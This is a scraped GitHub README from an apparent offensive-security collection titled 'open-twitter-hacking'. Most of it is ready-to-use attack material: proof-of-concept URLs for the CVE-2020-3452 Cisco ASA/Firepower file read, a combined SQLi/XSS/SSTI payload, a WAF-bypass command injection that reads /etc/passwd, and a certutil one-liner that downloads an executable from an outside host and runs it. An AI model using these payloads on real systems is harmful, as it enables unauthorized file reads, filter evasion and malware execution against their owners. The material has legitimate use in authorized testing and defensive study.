Skip to content

RASSec/open-twitter-hacking

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 

Repository files navigation

open-twitter-hacking

CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower

Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
For example to read "/+CSCOE+/portal_inc.lua" file.
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
POC #2: 
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua

Test SQLi + XSS + SSTI with the same payload use

'"><svg/onload=prompt(5);>{{1234*6543}}

Here's a command injection WAF bypass that works:

cat /e${hahaha}tc/${heywaf}pas${catchthis}swd

JAVA Serialization Vulnerability

https://medium.com/bugbountywriteup/a-comprehensive-guide-to-java-serialization-vulnerability-18fad6e37b64

cmd download file exec

cmd.exe /c certutil.exe -urlcache -split -f http://www.sec.com/sec.exe %SystemRoot%/Temp/sec.exe & cmd.exe /c %SystemRoot%/Temp/sec.exe

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published